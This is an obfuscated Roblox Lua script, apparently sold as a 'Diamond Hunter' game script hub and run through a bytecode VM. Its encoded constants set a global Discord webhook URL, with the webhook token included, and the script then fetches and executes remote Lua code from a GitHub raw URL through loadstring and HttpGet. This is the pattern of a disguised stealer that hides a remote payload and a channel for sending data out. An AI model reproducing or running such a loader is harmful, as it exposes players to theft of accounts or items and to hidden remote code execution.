--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-((1639 -(1523 + 114)) -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 58 + 6)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;else local v84=(929 -(214 + 713))^(v32-((1 -0) + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (877 -(282 + 595)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + ((1185 -(32 + 85)) -(68 + 997)) );v19=v19 + 4 ;return (v37 * 16777216) + (v36 * (66806 -(222 + 4 + 1044))) + (v35 * (1114 -858)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v38==(1905 -(1881 + 24))) then v39=0 -0 ;v40=nil;v38=1764 -(454 + 1309) ;end if (v38==2) then v43=nil;v44=nil;v38=2 + 1 ;end if (v38~=(1 -0)) then else v41=nil;v42=nil;v38=2 -0 ;end if (v38==(11 -7)) then v47=nil;while true do if (v39==3) then local v97=0;while true do if (v97~=0) then else v46=nil;v47=nil;v97=286 -(134 + 151) ;end if (v97~=(1666 -(970 + 695))) then else v39=4;break;end end end if (v39~=(7 -3)) then else while true do if (v40~=0) then else local v103=0;while true do if (v103==0) then v41=0;v42=nil;v103=1991 -(582 + 1408) ;end if (v103==1) then v40=1;break;end end end if (v40==(6 -4)) then v45=nil;v46=nil;v40=3;end if (v40==(1 -0)) then local v104=0;while true do if ((0 -0)==v104) then v43=nil;v44=nil;v104=1;end if ((1825 -(1195 + 629))==v104) then v40=2 -0 ;break;end end end if (v40==(244 -(187 + 54))) then v47=nil;while true do local v105=0;local v106;while true do if (0==v105) then v106=780 -(162 + 618) ;while true do if (v106~=1) then else if (v41==(0 + 0)) then local v153=0 + 0 ;local v154;local v155;while true do if (v153==1) then while true do if (v154==0) then v155=0 -0 ;while true do if (v155~=1) then else local v161=0 -0 ;local v162;while true do if (v161==(0 + 0)) then v162=0;while true do if (v162==(1636 -(1373 + 263))) then v44={};v45={v42,v43,nil,v44};v162=1385 -(746 + 638) ;end if (v162==(1 + 0)) then v155=2;break;end end break;end end end if (2==v155) then v41=1 -0 ;break;end if (v155==0) then local v163=341 -(218 + 123) ;while true do if ((1581 -(1535 + 46))==v163) then v42={};v43={};v163=1 + 0 ;end if (v163==(1 + 0)) then v155=561 -(306 + 254) ;break;end end end end break;end end break;end if (v153~=0) then else v154=0;v155=nil;v153=1 + 0 ;end end end break;end if (v106~=(0 -0)) then else local v150=0;while true do if (v150==0) then local v156=1467 -(899 + 568) ;while true do if (0~=v156) then else if (v41~=1) then else local v157=0 + 0 ;local v158;while true do if (v157~=(0 -0)) then else v158=603 -(268 + 335) ;while true do if (v158~=1) then else for v169=291 -(60 + 230) ,v46 do local v170=572 -(426 + 146) ;local v171;local v172;local v173;while true do if (v170==(1 + 0)) then v173=nil;while true do if (v171~=1) then else if (v172==(1457 -(282 + 1174))) then v173=v22()~=0 ;elseif (v172==(813 -(569 + 242))) then v173=v25();elseif (v172==3) then v173=v26();end v47[v169]=v173;break;end if (v171~=(0 -0)) then else local v177=0;while true do if (v177==1) then v171=1 + 0 ;break;end if ((1024 -(706 + 318))~=v177) then else v172=v22();v173=nil;v177=1252 -(721 + 530) ;end end end end break;end if (v170~=(1271 -(945 + 326))) then else v171=0;v172=nil;v170=2 -1 ;end end end v45[3]=v22();v158=2;end if (v158==(0 + 0)) then local v167=700 -(271 + 429) ;local v168;while true do if (v167~=(0 + 0)) then else v168=1500 -(1408 + 92) ;while true do if (v168==(1087 -(461 + 625))) then v158=1;break;end if (v168==0) then local v174=0;while true do if (v174~=(1289 -(993 + 295))) then else v168=1;break;end if (v174~=(0 + 0)) then else v46=v24();v47={};v174=1;end end end end break;end end end if (v158==(1173 -(418 + 753))) then v41=2;break;end end break;end end end if (v41==(1 + 1)) then local v159=0 + 0 ;local v160;while true do if (v159==0) then v160=0 + 0 ;while true do local v164=0;local v165;while true do if (v164==(0 + 0)) then v165=0;while true do if (v165==0) then if (v160==(529 -(406 + 123))) then local v175=0;while true do if (v175==1) then v160=1770 -(1749 + 20) ;break;end if (v175==(0 + 0)) then for v178=1323 -(1249 + 73) ,v24() do local v179=0 + 0 ;local v180;local v181;while true do if (v179==(1146 -(466 + 679))) then while true do if (v180==(0 -0)) then v181=v22();if (v21(v181,2 -1 ,1901 -(106 + 1794) )==0) then local v185=0;local v186;local v187;local v188;local v189;while true do if (1==v185) then v188=nil;v189=nil;v185=2;end if (v185~=2) then else while true do if ((1 + 2)~=v186) then else if (v21(v188,1 + 2 ,3)==1) then v189[4]=v47[v189[4]];end v42[v178]=v189;break;end if (v186==(5 -3)) then local v191=0 -0 ;while true do if (v191==(114 -(4 + 110))) then local v195=0;while true do if ((584 -(57 + 527))==v195) then if (v21(v188,1428 -(41 + 1386) ,1)~=1) then else v189[105 -(17 + 86) ]=v47[v189[2]];end if (v21(v188,2 + 0 ,2)==(1 -0)) then v189[8 -5 ]=v47[v189[169 -(122 + 44) ]];end v195=1 -0 ;end if (v195==1) then v191=3 -2 ;break;end end end if (v191==(1 + 0)) then v186=1 + 2 ;break;end end end if (v186~=1) then else local v192=0 -0 ;while true do if (v192==(66 -(30 + 35))) then v186=2;break;end if ((0 + 0)==v192) then v189={v23(),v23(),nil,nil};if (v187==0) then local v196=1212 -(323 + 889) ;local v197;local v198;while true do if (v196~=0) then else v197=0;v198=nil;v196=1;end if ((2 -1)==v196) then while true do if (v197~=0) then else v198=580 -(361 + 219) ;while true do if (v198==0) then v189[323 -(53 + 267) ]=v23();v189[4]=v23();break;end end break;end end break;end end elseif (v187==(1 + 0)) then v189[3]=v24();elseif (v187==2) then v189[3]=v24() -(2^(429 -(15 + 398))) ;elseif (v187~=(985 -(18 + 964))) then else local v205=0 -0 ;local v206;while true do if (v205==(0 + 0)) then v206=0 + 0 ;while true do if (v206==0) then v189[853 -(20 + 830) ]=v24() -(2^(13 + 3)) ;v189[130 -(116 + 10) ]=v23();break;end end break;end end end v192=1 + 0 ;end end end if (0~=v186) then else v187=v21(v181,740 -(542 + 196) ,6 -3 );v188=v21(v181,4,2 + 4 );v186=1 + 0 ;end end break;end if (v185==0) then v186=0 + 0 ;v187=nil;v185=1;end end end break;end end break;end if (v179~=(0 -0)) then else local v184=0 -0 ;while true do if (1==v184) then v179=1;break;end if ((1551 -(1126 + 425))~=v184) then else v180=405 -(118 + 287) ;v181=nil;v184=1;end end end end end for v182=3 -2 ,v24() do v43[v182-1 ]=v29();end v175=1122 -(118 + 1003) ;end end end if (v160==(2 -1)) then return v45;end break;end end break;end end end break;end end end v156=378 -(142 + 235) ;end if (v156==(4 -3)) then v150=1;break;end end end if (v150~=(1 + 0)) then else v106=978 -(553 + 424) ;break;end end end end break;end end end break;end end break;end if (v39==(3 -1)) then local v98=0;while true do if ((0 + 0)==v98) then v44=nil;v45=nil;v98=1;end if (v98==1) then v39=3 + 0 ;break;end end end if (v39~=0) then else local v99=0;while true do if (0==v99) then v40=0;v41=nil;v99=1 + 0 ;end if (v99==(1 + 0)) then v39=1;break;end end end if (v39==1) then local v100=0;while true do if (v100==1) then v39=2;break;end if (0~=v100) then else v42=nil;v43=nil;v100=1 + 0 ;end end end end break;end if (v38~=(6 -3)) then else v45=nil;v46=nil;v38=4;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=0 -0 ;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==(2 -1)) then v51=1 + 0 ;v52=(v21(v50,(1005 -(938 + 63)) -3 ,773 -(239 + 514) ) * ((1 + 1)^(1361 -(797 + 532)))) + v49 ;v48=5 -3 ;end if ((0 + 0)==v48) then v49=v24();v50=v24();v48=1 + 0 ;end if (v48==(2 + 0)) then v53=v21(v50,8 + 13 ,72 -41 );v54=((v21(v50,1234 -(287 + 86 + 829) )==(732 -(476 + 255))) and  -(1131 -(369 + 761))) or (1 + (1125 -(936 + 189))) ;v48=11 -8 ;end if (v48==(5 -2)) then if (v53==(0 -0)) then if (v52==(0 + 0)) then return v54 * (1661 -(1477 + 184)) ;else v53=1 -0 ;v51=0 + 0 ;end elseif (v53==(2903 -(564 + 292))) then return ((v52==(238 -(64 + (1787 -(1565 + 48))))) and (v54 * ((1 + 0)/(0 -(0 + 0))))) or (v54 * NaN) ;end return v8(v54,v53-(1359 -(144 + 192)) ) * (v51 + (v52/(((1356 -(782 + 356)) -(42 + (441 -(176 + 91))))^(528 -(41 + 435))))) ;end end end v26=nil;function v26(v55)local v56=0;local v57;local v58;while true do if (v56==(0 -0)) then v57=nil;if  not v55 then v55=v24();if (v55==((0 -0) -(0 -0))) then return "";end end v56=1093 -(975 + (269 -152)) ;end if ((1876 -(157 + 1718))==v56) then v57=v3(v16,v19,(v19 + v55) -(1 + 0 + 0) );v19=v19 + v55 ;v56=(11 -5) -4 ;end if (v56==2) then v58={};for v91=3 -2 , #v57 do v58[v91]=v2(v1(v3(v57,v91,v91)));end v56=1021 -(697 + 321) ;end if (v56==3) then return v6(v58);end end end v18=5;end if (v18==2) then function v22()local v59=v1(v16,v19,v19);v19=v19 + 1 ;return v59;end v23=nil;function v23()local v60,v61=v1(v16,v19,v19 + (1229 -(322 + 905)) );v19=v19 + (5 -3) ;return (v61 * (1445 -(449 + 740))) + v60 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then local v85=0;while true do if (v85==0) then v20=v0(v3(v62,1,1));return "";end end else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v62,16));if v20 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v87,v20);v20=nil;v101=1;end end else return v87;end break;end end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v69=v66;local v70=v67;local v71=v68;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=7) then if (v82<=3) then if (v82<=1) then if (v82>0) then v79[v81[2]]();else do return;end end elseif (v82==2) then local v107=v81[2];local v108=v79[v81[3]];v79[v107 + 1 ]=v108;v79[v107]=v108[v81[4]];else do return;end end elseif (v82<=5) then if (v82==4) then v79[v81[2]]=v81[3];else v79[v81[2]]=v65[v81[3]];end elseif (v82==6) then local v116=0;local v117;while true do if (v116==0) then v117=v81[2];v79[v117]=v79[v117](v13(v79,v117 + 1 ,v74));break;end end else v79[v81[2]]();end elseif (v82<=11) then if (v82<=9) then if (v82>8) then local v118=v81[2];local v119,v120=v72(v79[v118](v13(v79,v118 + 1 ,v81[3])));v74=(v120 + v118) -1 ;local v121=0;for v142=v118,v74 do v121=v121 + 1 ;v79[v142]=v119[v121];end else local v122=v81[2];local v123=v79[v81[3]];v79[v122 + 1 ]=v123;v79[v122]=v123[v81[4]];end elseif (v82>10) then local v127=0;local v128;local v129;local v130;local v131;while true do if (v127==1) then v74=(v130 + v128) -1 ;v131=0;v127=2;end if (v127==0) then v128=v81[2];v129,v130=v72(v79[v128](v13(v79,v128 + 1 ,v81[3])));v127=1;end if (2==v127) then for v148=v128,v74 do local v149=0;while true do if (v149==0) then v131=v131 + 1 ;v79[v148]=v129[v131];break;end end end break;end end else v79[v81[2]]=v65[v81[3]];end elseif (v82<=13) then if (v82==12) then v79[v81[2]][v81[3]]=v81[4];else local v136=v81[2];v79[v136]=v79[v136](v13(v79,v136 + 1 ,v74));end elseif (v82==14) then v79[v81[2]][v81[3]]=v81[4];else v79[v81[2]]=v81[3];end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O0003023O005F4703083O00557365726E616D6503103O004D696E6547656D53637269707430323003073O004875624E616D65030E3O004469616D6F6E642048756E746572030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313230343138313337332O323536313633372F72774B753247544E4C57694E72714D3557515F5254552D5F585530575A4A484F6E526B4362545A333734554572522D343055724E764F5F653447716E6242444954755278030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C7561000E3O0012053O00013O00300C3O000200030012053O00013O00300C3O000400050012053O00013O00300C3O000600070012053O00083O001205000100093O00200200010001000A0012040003000B4O0009000100034O000D5O00022O00073O000100012O00033O00017O00",v9(),...);end
